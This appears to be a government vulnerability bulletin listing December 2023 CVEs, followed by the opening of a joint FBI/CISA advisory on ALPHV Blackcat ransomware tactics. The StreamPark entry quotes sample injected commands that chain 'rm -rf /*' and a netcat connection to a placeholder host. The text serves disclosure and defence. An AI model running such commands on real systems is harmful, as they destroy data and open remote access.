apache — airflow Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue 2023-12-21 not yet calculated CVE-2023-50783
security@apache.org
security@apache.org
security@apache.org
apple — macos A session rendering issue was addressed with improved session tracking. This issue is fixed in macOS Sonoma 14.2.1. A user who shares their screen may unintentionally share the incorrect content. 2023-12-19 not yet calculated CVE-2023-42940
product-security@apple.com
product-security@apple.com
array — arrayos_ag MotionPro in Array ArrayOS AG before 9.4.0.505 on AG and vxAG allows remote command execution via crafted packets. AG and vxAG 9.3.0.259.x are unaffected. 2023-12-22 not yet calculated CVE-2023-51707
cve@mitre.org
assetwise_integrity_information_server — assetwise_integrity_information_server Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25. 2023-12-22 not yet calculated CVE-2023-51708
cve@mitre.org
bcoin-org — bcoin An issue was discovered in bcoin-org bcoin version 2.2.0, allows remote attackers to obtain sensitive information via weak hashing algorithms in the component vendorfaye-websocket.js. 2023-12-21 not yet calculated CVE-2023-50475
cve@mitre.org
cve@mitre.org
blinksocks — blinksocks An issue was discovered in blinksocks version 3.3.8, allows remote attackers to obtain sensitive information via weak encryption algorithms in the component /presets/ssr-auth-chain.js. 2023-12-21 not yet calculated CVE-2023-50481
cve@mitre.org
cve@mitre.org
buildkite — elastic_ci_for_aws A symbolic link following vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to change ownership of arbitrary directories via the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43116
cve@mitre.org
buildkite — elastic_ci_for_aws A time-of-check-time-of-use race condition vulnerability in Buildkite Elastic CI for AWS versions prior to 6.7.1 and 5.22.5 allows the buildkite-agent user to bypass a symbolic link check for the PIPELINE_PATH variable in the fix-buildkite-agent-builds-permissions script. 2023-12-22 not yet calculated CVE-2023-43741
cve@mitre.org
cacti — cacti Reflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php. 2023-12-22 not yet calculated CVE-2023-50569
cve@mitre.org
cve@mitre.org
cams_biometrics — multiple_products SQL injection vulnerability in Cams Biometrics Zkteco, eSSL, Cams Biometrics Integration Module with HR Attendance (aka odoo-biometric-attendance) v. 13.0 through 16.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the db parameter in the controllers/controllers.py component. 2023-12-15 not yet calculated CVE-2023-48050
cve@mitre.org
cesanta — mjs Buffer Overflow vulnerability in Cesanta MJS version 2.22.0, allows attackers to execute arbitrary code, cause a denial of service (Dos), and obtain sensitive information via segmentation fault can occur in getprop_builtin_foreign when input string includes a name of Built-in APIs. 2023-12-20 not yet calculated CVE-2023-50044
cve@mitre.org
cve@mitre.org
cryptopp —  cryptopp Crypto++ (aka cryptopp) through 8.9.0 has a Marvin side channel during decryption with PKCS#1 v1.5 padding. 2023-12-18 not yet calculated CVE-2023-50979
cve@mitre.org
cryptopp —  cryptopp gf2n.cpp in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (application crash) via DER public-key data for an F(2^m) curve, if the degree of each term in the polynomial is not strictly decreasing. 2023-12-18 not yet calculated CVE-2023-50980
cve@mitre.org
cryptopp —  cryptopp ModularSquareRoot in Crypto++ (aka cryptopp) through 8.9.0 allows attackers to cause a denial of service (infinite loop) via crafted DER public-key data associated with squared odd numbers, such as the square of 268995137513890432434389773128616504853. 2023-12-18 not yet calculated CVE-2023-50981
cve@mitre.org
cuppacms — cuppacms SQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter. 2023-12-20 not yet calculated CVE-2023-47990
cve@mitre.org
devolutions — remote_desktop_manager Inadequate validation of permissions when employing remote tools and macros via the context menu within Devolutions Remote Desktop Manager versions 2023.3.31 and earlier permits a user to initiate a connection without proper execution rights via the remote tools feature. This affects only SQL data sources. 2023-12-21 not yet calculated CVE-2023-7047
security@devolutions.net
filerun — filerun FileRun 20220519 allows SQL Injection via the “dir” parameter in a /?module=users&section=cpanel&page=list request. 2023-12-22 not yet calculated CVE-2022-47532
cve@mitre.org
free5gc — free5gc An issue was discovered in free5GC version 3.3.0, allows remote attackers to execute arbitrary code and cause a denial of service (DoS) on AMF component via crafted NGAP message. 2023-12-22 not yet calculated CVE-2023-49391
cve@mitre.org
google — chrome Insufficient policy enforcement in ADB in Google Chrome on ChromeOS prior to 114.0.5735.90 allowed a local attacker to bypass device policy restrictions via physical access to the device. (Chromium security severity: High) 2023-12-20 not yet calculated CVE-2023-3742
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google — chrome Heap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2023-12-21 not yet calculated CVE-2023-7024
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
heimdal — thor_agent An issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to bypass network filtering, execute arbitrary code, and obtain sensitive information via DarkLayer Guard threat prevention module. 2023-12-21 not yet calculated CVE-2023-29485
cve@mitre.org
heimdal — thor_agent An issue was discovered in Heimdal Thor agent versions 3.4.2 and before 3.7.0 on Windows, allows attackers to bypass USB access restrictions, execute arbitrary code, and obtain sensitive information via Next-Gen Antivirus component. 2023-12-21 not yet calculated CVE-2023-29486
cve@mitre.org
heimdal — thor_agent An issue was discovered in Heimdal Thor agent versions 3.4.2 and before on Windows and 2.6.9 and before on macOS, allows attackers to cause a denial of service (DoS) via the Threat To Process Correlation threat prevention module. 2023-12-21 not yet calculated CVE-2023-29487
cve@mitre.org
huggingface — transformers Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. 2023-12-19 not yet calculated CVE-2023-6730
security@huntr.dev
security@huntr.dev
huggingface — transformers Deserialization of Untrusted Data in GitHub repository huggingface/transformers prior to 4.36. 2023-12-20 not yet calculated CVE-2023-7018
security@huntr.dev
security@huntr.dev
ivanti — avalanche An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. 2023-12-19 not yet calculated CVE-2021-22962
support@hackerone.com
ivanti — avalanche An unauthenticated attacked could send a specifically crafted web request causing a Server-Side Request Forgery (SSRF) in Ivanti Avalanche Remote Control server. 2023-12-19 not yet calculated CVE-2023-46262
support@hackerone.com
ivanti — avalanche An attacker can send a specially crafted request which could lead to leakage of sensitive data or potentially a resource-based DoS attack. 2023-12-19 not yet calculated CVE-2023-46266
support@hackerone.com
libming — libming Buffer Overflow vulnerability in libming version 0.4.8, allows attackers to execute arbitrary code and obtain sensitive information via parser.c component. 2023-12-20 not yet calculated CVE-2023-50628
cve@mitre.org
cve@mitre.org
linotp — linotp Defective request context handling in Self Service in LinOTP 3.x before 3.2.5 allows remote unauthenticated attackers to escalate privileges, thereby allowing them to act as and with the permissions of another user. Attackers must generate repeated API requests to trigger a race condition with concurrent user activity in the self-service portal. 2023-12-19 not yet calculated CVE-2023-49706
cve@mitre.org
cve@mitre.org
cve@mitre.org
lockss-daemon — lockss-daemon lockss-daemon (aka Classic LOCKSS Daemon) before 1.77.3 performs post-Unicode normalization, which may allow bypass of intended access restrictions, such as when U+1FEF is converted to a backtick. 2023-12-15 not yet calculated CVE-2023-42183
cve@mitre.org
ltb_self_service_password — ltb_self_service_password An issue in LTB Self Service Password before v.1.5.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via hijack of the SMS verification code function to arbitrary phone. 2023-12-21 not yet calculated CVE-2023-49032
cve@mitre.org
cve@mitre.org
mediawiki — mediawiki An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights. 2023-12-22 not yet calculated CVE-2023-51704
cve@mitre.org
mlflow — mlflow with only one user interaction(download a malicious config), attackers can gain full command execution on the victim system. 2023-12-19 not yet calculated CVE-2023-6940
security@huntr.dev
security@huntr.dev
mlflow — mlflow A malicious user could use this issue to access internal HTTP(s) servers and in the worst case (ie: aws instance) it could be abuse to get a remote code execution on the victim machine. 2023-12-20 not yet calculated CVE-2023-6974
security@huntr.dev
security@huntr.dev
mlflow — mlflow A malicious user could use this issue to get command execution on the vulnerable machine and get access to data & models information. 2023-12-20 not yet calculated CVE-2023-6975
security@huntr.dev
security@huntr.dev
mlflow — mlflow This vulnerability is capable of writing arbitrary files into arbitrary locations on the remote filesystem in the context of the server process. 2023-12-20 not yet calculated CVE-2023-6976
security@huntr.dev
security@huntr.dev
mlflow — mlflow This vulnerability enables malicious users to read sensitive files on the server. 2023-12-20 not yet calculated CVE-2023-6977
security@huntr.dev
security@huntr.dev
mp3gain — mp3gain A stack buffer overflow vulnerability in MP3Gain v1.6.2 allows an attacker to cause a denial of service via the WriteMP3GainAPETag function at apetag.c:592. 2023-12-22 not yet calculated CVE-2023-49356
cve@mitre.org
multiple_vendors — multiple_products Matrix SSL 4.x through 4.6.0 and Rambus TLS Toolkit have a length-subtraction integer overflow for Client Hello Pre-Shared Key extension parsing in the TLS 1.3 server. An attacked device calculates an SHA-2 hash over at least 65 KB (in RAM). With a large number of crafted TLS messages, the CPU becomes heavily loaded. This occurs in tls13VerifyBinder and tls13TranscriptHashUpdate. 2023-12-22 not yet calculated CVE-2023-24609
cve@mitre.org
cve@mitre.org
nintendo — ds DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 allows remote attackers to execute arbitrary code on a game-playing client’s machine via a modified GPCM message. 2023-12-20 not yet calculated CVE-2023-45887
cve@mitre.org
cve@mitre.org
nos_client — nos_client An issue was discovered in nos client version 0.6.6, allows remote attackers to escalate privileges via getRPCEndpoint.js. 2023-12-21 not yet calculated CVE-2023-50477
cve@mitre.org
cve@mitre.org
openssh — openssh The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH’s use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust. 2023-12-18 not yet calculated CVE-2023-48795
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
pdf24_creator — pdf24_creator An issue was discovered in PDF24 Creator 11.14.0. The configuration of the msi installer file was found to produce a visible cmd.exe window when using the repair function of msiexec.exe. This allows an unprivileged local attacker to use a chain of actions (e.g., an oplock on faxPrnInst.log) to open a SYSTEM cmd.exe. 2023-12-19 not yet calculated CVE-2023-49147
cve@mitre.org
cve@mitre.org
cve@mitre.org
phpsysinfo — phpsysinfo Cross Site Request Forgery (CSRF) vulnerability in Phpsysinfo version 3.4.3 allows a remote attacker to obtain sensitive information via a crafted page in the XML.php file. 2023-12-19 not yet calculated CVE-2023-49006
cve@mitre.org
cve@mitre.org
cve@mitre.org
proftpd — proftpd make_ftp_cmd in main.c in ProFTPD before 1.3.8a has a one-byte out-of-bounds read, and daemon crash, because of mishandling of quote/backslash semantics. 2023-12-22 not yet calculated CVE-2023-51713
cve@mitre.org
cve@mitre.org
cve@mitre.org
qbit-matui — qbit-matui Cross-Site Scripting (XSS) vulnerability in bill-ahmed qbit-matUI version 1.16.4, allows remote attackers to obtain sensitive information via fixed session identifiers (SID) in index.js file. 2023-12-21 not yet calculated CVE-2023-50473
cve@mitre.org
cve@mitre.org
ruijie — ws6008 Ruijie WS6008 v1.x v2.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 and WS6108 v1.x AC_RGOS11.9(6)W3B2_G2C6-01_10221911 was discovered to contain a command injection vulnerability via the function downFiles. 2023-12-20 not yet calculated CVE-2023-50993
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_newsauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51048
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_bbsauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51049
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51050
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_textauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51051
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_formauth parameter at /admin/ajax.php. 2023-12-21 not yet calculated CVE-2023-51052
cve@mitre.org
smartertools — smartermail SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS by using image/svg+xml and an uploaded SVG document. This occurs because the application tries to allow youtube.com URLs, but actually allows youtube.com followed by an @ character and an attacker-controlled domain name. 2023-12-21 not yet calculated CVE-2023-48114
cve@mitre.org
cve@mitre.org
smartertools — smartermail SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored DOM XSS because an XSS protection mechanism is skipped when messageHTML and messagePlainText are set in the same request. 2023-12-21 not yet calculated CVE-2023-48115
cve@mitre.org
cve@mitre.org
smartertools — smartermail SmarterTools SmarterMail 8495 through 8664 before 8747 allows stored XSS via a crafted description of a Calendar appointment. 2023-12-21 not yet calculated CVE-2023-48116
cve@mitre.org
cve@mitre.org
softing — edgeaggregator Softing edgeAggregator Restore Configuration Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Softing edgeAggregator. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of backup zip files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this to execute code in the context of root. Was ZDI-CAN-20543. 2023-12-19 not yet calculated CVE-2023-38126
zdi-disclosures@trendmicro.com
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) 3.7.0 through 3.7.39, 3.11.0 through 3.11.27, 4.3.0 through 4.3.22, 4.6.0 through 4.6.9, and 4.7.0 through 4.7.1. It’s possible to know if a specific user account exists on the SNS firewall by using remote access commands. 2023-12-21 not yet calculated CVE-2023-41166
cve@mitre.org
stormshield_network_security — stormshield_network_security An issue was discovered in Stormshield Network Security (SNS) 4.0.0 through 4.3.21, 4.4.0 through 4.6.8, and 4.7.0. Sending a crafted ICMP packet may lead to a crash of the ASQ engine. 2023-12-21 not yet calculated CVE-2023-47093
cve@mitre.org
streampark — streampark In streampark, there is a project module that integrates Maven’s compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use “||” or “&&”: /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & 2023-12-15 not yet calculated CVE-2023-49898
security@apache.org
sudo — sudo Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit. 2023-12-22 not yet calculated CVE-2023-42465
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
thirty_bees — thirty_bees A stored cross-site scripting (XSS) vulnerability in the component admin/AdminRequestSqlController.php of thirty bees before 1.5.0 allows attackers to execute arbitrary web script or HTML via $e->getMessage() error mishandling. 2023-12-22 not yet calculated CVE-2023-45957
cve@mitre.org
cve@mitre.org
cve@mitre.org
totolink — a3700r There is an arbitrary command execution vulnerability in the setDiagnosisCfg function of the cstecgi .cgi of the TOTOlink A3700R router device in its firmware version V9.1.2u.5822_B20200513. 2023-12-22 not yet calculated CVE-2023-50147
cve@mitre.org
totolink — ex1200l TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi setOpModeCfg interface. 2023-12-22 not yet calculated CVE-2023-51033
cve@mitre.org
totolink — ex1200l TOTOlink EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution via the cstecgi.cgi UploadFirmwareFile interface. 2023-12-22 not yet calculated CVE-2023-51034
cve@mitre.org
totolink — ex1200l TOTOLINK EX1200L V9.3.5u.6146_B20201023 is vulnerable to arbitrary command execution on the cstecgi.cgi NTPSyncWithHost interface. 2023-12-22 not yet calculated CVE-2023-51035
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanPriDns parameter’ of the setLanConfig interface of the cstecgi .cgi 2023-12-22 not yet calculated CVE-2023-51011
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanGateway parameter’ of the setLanConfig interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51012
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanNetmask parameter’ of the setLanConfig interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51013
cve@mitre.org
totolink — ex1800t TOTOLINK EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanSecDns parameter’ of the setLanConfig interface of the cstecgi .cgi 2023-12-22 not yet calculated CVE-2023-51014
cve@mitre.org
totolink — ex1800t TOTOLINX EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘enable parameter’ of the setDmzCfg interface of the cstecgi .cgi 2023-12-22 not yet calculated CVE-2023-51015
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the setRebootScheCfg interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51016
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanIp parameter’ of the setLanConfig interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51017
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘opmode’ parameter of the setWiFiApConfig interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51018
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘key5g’ parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51019
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langType’ parameter of the setLanguageCfg interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51020
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘merge’ parameter of the setRptWizardCfg interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51021
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘langFlag’ parameter of the setLanguageCfg interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51022
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘host_time’ parameter of the NTPSyncWithHost interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51023
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘tz’ parameter of the setNtpCfg interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51024
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51025
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘hour’ parameter of the setRebootScheCfg interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51026
cve@mitre.org
totolink — ex1800t TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘apcliAuthMode’ parameter of the setWiFiExtenderConfig interface of the cstecgi .cgi. 2023-12-22 not yet calculated CVE-2023-51027
cve@mitre.org
totolink — ex1800t TOTOLINK EX1800T 9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the apcliChannel parameter of the setWiFiExtenderConfig interface of the cstecgi.cgi. 2023-12-22 not yet calculated CVE-2023-51028
cve@mitre.org
weintek — cmt2078x_easyweb An authenticated command injection vulnerability in Weintek cMT2078X easyweb Web Version v2.1.3, OS v20220215 allows attackers to execute arbitrary code or access sensitive information via injecting a crafted payload into the HMI Name parameter. 2023-12-19 not yet calculated CVE-2023-50466
cve@mitre.org
windows — multiple_products An issue discovered in TheGreenBow Windows Enterprise Certified VPN Client 6.52, Windows Standard VPN Client 6.87, and Windows Enterprise VPN Client 6.87 allows attackers to gain escalated privileges via crafted changes to memory mapped file. 2023-12-19 not yet calculated CVE-2023-47267
cve@mitre.org
xpand_it — write-back_manager Xpand IT Write-back Manager v2.3.1 uses weak secret keys to sign JWT tokens. This allows attackers to easily obtain the secret key used to sign JWT tokens via a bruteforce attack. 2023-12-20 not yet calculated CVE-2023-27172
cve@mitre.org

Back to top

Categories
alerts

#StopRansomware: ALPHV Blackcat

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as Dec. 6, 2023.

This advisory provides updates to the FBI FLASH BlackCat/ALPHV Ransomware Indicators of Compromise released April 19, 2022. Since previous reporting, ALPHV Blackcat actors released a new version of the malware, and the FBI identified over 1000 victims worldwide targeted via ransomware and/or data extortion.

FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ALPHV Blackcat ransomware and data extortion incidents.

In February 2023, ALPHV Blackcat administrators announced the ALPHV Blackcat Ransomware 2.0 Sphynx update, which was rewritten to provide additional features to affiliates, such as better defense evasion and additional tooling. This ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, and VMWare instances. ALPHV Blackcat affiliates have extensive networks and experience with ransomware and data extortion operations. According to the FBI, as of September 2023, ALPHV Blackcat affiliates have compromised over 1000 entities—nearly 75 percent of which are in the United States and approximately 250 outside the United States—, demanded over $500 million, and received nearly $300 million in ransom payments.

Download the PDF version of this report:

AA23-353A #StopRansomware: ALPHV Blackcat
(PDF, 477.69 KB
)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

ALPHV Blackcat affiliates use advanced social engineering techniques and open source research on a company to gain initial access. Actors pose as company IT and/or helpdesk staff and use phone calls or SMS messages [T1598] to obtain credentials from employees to access the target network [T1586]. ALPHV Blackcat affiliates use uniform resource locators (URLs) to live-chat with victims to convey demands and initiate processes to restore the victims’ encrypted files.

After gaining access to a victim network, ALPHV Blackcat affiliates deploy remote access software such as AnyDesk, Mega sync, and Splashtop in preparation of data exfiltration. After gaining access to networks, ALPHV Blackcat affiliates use legitimate remote access and tunneling tools, such as Plink and Ngrok [S0508]. ALPHV Blackcat affiliates claim to use Brute Ratel C4 [S1063] and Cobalt Strike [S1054] as beacons to command and control servers. ALPHV Blackcat affiliates use the open source adversary-in-the-middle attack [T1557] framework Evilginx2, which allows them to obtain multifactor authentication (MFA) credentials, login credentials, and session cookies. The actors also obtain passwords from the domain controller, local network, and deleted backup servers to move laterally throughout the network [T1555].

To evade detection, affiliates employ allowlisted applications such as Metasploit. Once installed on the domain controller, the logs are cleared on the exchange server. Then Mega.nz or Dropbox are used to move, exfiltrate, and/or download victim data. The ransomware is then deployed, and the ransom note is embedded as a file.txt. According to public reporting, affiliates have additionally used POORTRY and STONESTOP to terminate security processes.

Some ALPHV Blackcat affiliates exfiltrate data after gaining access and extort victims without deploying ransomware. After exfiltrating and/or encrypting data, ALPHV Blackcat affiliates communicate with victims via TOR [S0183], Tox, email, or encrypted applications. The threat actors then delete victim data from the victim’s system.

ALPHV Blackcat affiliates offer to provide unsolicited cyber remediation advice as an incentive for payment, offering to provide victims with “vulnerability reports” and “security recommendations” detailing how they penetrated the system and how to prevent future re-victimization upon receipt of ransom payment.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1 through Table 3 for all referenced threat actor tactics and techniques in this advisory.

Table 1: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Reconnaissance
Technique Title ID Use

Phishing for Information

T1598

ALPHV Blackcat affiliates pose as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees to access the target network.
Table 2: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Resource Development
Technique Title ID Use

Compromise Accounts

T1586

ALPHV Blackcat affiliates use compromised accounts to gain access to victims’ networks.
Table 3: ALPHV Blackcat/ALPHV Threat Actors ATT&CK Techniques – Credential Access
